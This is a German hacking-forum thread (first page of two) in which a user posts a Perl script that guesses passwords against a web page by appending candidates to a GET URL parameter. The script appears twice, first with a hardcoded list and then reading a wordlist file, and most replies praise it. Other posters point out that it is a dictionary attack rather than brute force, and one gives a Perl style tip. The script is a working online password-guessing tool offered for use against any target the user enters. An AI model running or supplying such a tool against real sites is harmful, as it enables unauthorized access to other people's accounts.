Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 19

Thema: [Perl] Bruter

  1. #1
    Duck and Cover Avatar von $_staX
    Registriert seit
    27.07.2008
    Beiträge
    294

    Standard [Perl] Bruter

    Nur ein kleiner Bruter der nur veranschaulichen soll wie man einen Get Bruteforcer realisieren kann:
    Code:
    #!/usr/bin/perl
    use HTTP::Request;
    use LWP::UserAgent;
    ############################
    #      Get Bruteforcer     #
    #         by $_staX        #
    ############################
    $counter = 0;
    print "\n\t\t\tGet Bruteforcer by \$_staX\n";
    print "\t\tExample: http://target.de/passwort.php?passwort=\n\n";
    print "Target angeben in Form von example: ";
    $target = <STDIN>;
    chomp $target;
    if ($target !~ /^http:/){
    $target = "http:\/\/".$target;
    }
    @passwords=('admin','qwertz123','qwertz','++++en123','++++en','gaylord'); #Ja hier müssen halt die Passwörter stehen, die gebrutet werden
    foreach $pw(@passwords){
    $site = $target.$pw;
    $request = new HTTP::Request(GET=>$site);
    $useragent= new LWP::UserAgent;
    $response=$useragent->request($request);
    $counter++;
    if($response->content =~ /richtig/i){ #Ausgabe der Seite wenn das Pw richtig ist
    print "\n\n[+] Passwort cracked: $pw\n";
    }else{
    print "\n[-] Tested $counter: $pw";
    }
    }

  2. #2
    bit creepy!? Avatar von trisn
    Registriert seit
    01.01.2009
    Beiträge
    894

    Standard

    nicht schlecht
    __ __
    \/----\/
    \0 0/
    _\ /_
    _| \/ |_
    | | | | | |
    _| | | | | |_
    "---|_|--|_|---"


    määäähh.

  3. #3
    Michelangelo Virus
    Registriert seit
    29.06.2008
    Beiträge
    273

    Standard

    @passwords=('admin','qwertz123','qwertz','++++en12 3','++++en','gaylord'); #Ja hier müssen halt die Passwörter stehen, die gebrutet werden
    Macht irgendwie alles uneffizient. Sinnvoller wäre es die Passwörter aus einer Liste auszulesen, ist garnicht so schwer in perl!. aber da es nur eine veranschaulichung ist. nice

    GreeZ

  4. #4
    Gesperrt
    Registriert seit
    24.07.2008
    Beiträge
    374

    Standard

    nice danke ;D

  5. #5
    Duck and Cover Avatar von $_staX
    Registriert seit
    27.07.2008
    Beiträge
    294

    Standard

    Zitat Zitat von int_main(); Beitrag anzeigen
    Macht irgendwie alles uneffizient. Sinnvoller wäre es die Passwörter aus einer Liste auszulesen, ist garnicht so schwer in perl!. aber da es nur eine veranschaulichung ist. nice

    GreeZ
    Ja na klar ist es so eg wertlos. Ich wollte nur zeigen wie ein Bruteforceprogramm aussehen könnte, wenn Interesse besteht kann ich es gerne noch mit einer Liste versuchen, aus der die Passwörter ausgelesen werden.

  6. #6
    bit creepy!? Avatar von trisn
    Registriert seit
    01.01.2009
    Beiträge
    894

    Standard

    daran wäre ich sogar noch mehr interessiert ^^
    __ __
    \/----\/
    \0 0/
    _\ /_
    _| \/ |_
    | | | | | |
    _| | | | | |_
    "---|_|--|_|---"


    määäähh.

  7. #7
    Duck and Cover Avatar von $_staX
    Registriert seit
    27.07.2008
    Beiträge
    294

    Standard

    Ok hab mich kurz hingesetzt:
    Code:
    #!/usr/bin/perl
    use HTTP::Request;
    use LWP::UserAgent;
    ############################
    #      Get Bruteforcer     #
    #         by $_staX        #
    ############################
    $counter = 0;
    print "\n\t\t\tGet Bruteforcer by \$_staX\n";
    print "\t\tExample: http://target.de/passwort.php?passwort=\n\n";
    print "Target angeben in Form von example: ";
    $target = <STDIN>;
    chomp $target;
    if ($target !~ /^http:/){
    $target = "http:\/\/".$target;
    }
    open(List, "< list.txt") || print"list.txt not found!";
    foreach $pw(<List>){
    chomp($pw);
    $site = $target.$pw;
    $request = new HTTP::Request(GET=>$site);
    $useragent= new LWP::UserAgent;
    $response=$useragent->request($request);
    $counter++;
    if($response->content =~ /richtig/i){
    print "\n\n[+] Passwort cracked: $pw\n";
    }else{
    print "\n[-] Tested $counter: $pw";
    }
    }
    print "\n\nDone!!"
    Die Wordlist muss list.txt heißen und im selben Verzeichnis sein wie der Bruter.
    Geändert von $_staX (24.02.2009 um 20:41 Uhr)

  8. #8
    CIH-Virus Avatar von -[RiDER]-
    Registriert seit
    05.01.2007
    Beiträge
    496

    Standard

    Hi :-D
    Das ist kein Brute-Forcing!

    http://de.wikipedia.org/wiki/Brute-Force-Methode

    Das hier fällt wohl eher unter die Kategorie "Wörterbuchangriff" ;-)
    Als solcher aber ganz nett. :-)

    GreetZ RiDER

  9. #9
    Duck and Cover Avatar von $_staX
    Registriert seit
    27.07.2008
    Beiträge
    294

    Standard

    Joa stimmt es ist ein Wörterbuchangriff, aber ein Wörterbuchangriff fällt doch auch unter Bruteforce oder?!
    Außerdem hört sich Wörterbuchangreifer scheiße an xD

  10. #10
    CIH-Virus Avatar von -[RiDER]-
    Registriert seit
    05.01.2007
    Beiträge
    496

    Standard

    Hi
    Zitat Zitat von $_staX Beitrag anzeigen
    Joa stimmt es ist ein Wörterbuchangriff, aber ein Wörterbuchangriff fällt doch auch unter Bruteforce oder?!
    Nein, eben nicht.

    Und open() sollte in der 3-Argumentform verwendet werden.
    In Deinem Fall belanglos, aber wenns Gewohnheit wird, kannst schnell zum Stolperstein werden... ;-)

    GreetZ RiDER

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •